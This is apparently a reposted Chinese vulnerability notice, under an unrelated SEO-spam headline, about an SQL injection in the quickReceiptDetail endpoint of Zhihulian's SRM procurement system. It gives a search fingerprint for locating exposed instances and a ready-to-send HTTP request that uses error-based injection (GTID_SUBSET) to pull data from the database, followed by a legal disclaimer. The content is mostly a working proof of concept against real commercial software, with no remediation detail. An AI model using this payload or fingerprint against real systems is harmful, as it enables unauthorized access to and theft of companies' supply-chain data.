您的位置:首页 > 科技 > 能源 > 东莞外贸公司网站制作_160加工网_seo关键词优化价格_软文营销

东莞外贸公司网站制作_160加工网_seo关键词优化价格_软文营销

2024/12/27 6:12:22 来源:https://blog.csdn.net/IDHALASHAO/article/details/143981004  浏览:    关键词:东莞外贸公司网站制作_160加工网_seo关键词优化价格_软文营销
东莞外贸公司网站制作_160加工网_seo关键词优化价格_软文营销

漏洞描述

智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。

资产概要

title=="SRM 2.0"

 漏洞复现 

GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20VERSION()),0x7176787671),3060) HTTP/1.1
Host: *****

免责声明

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com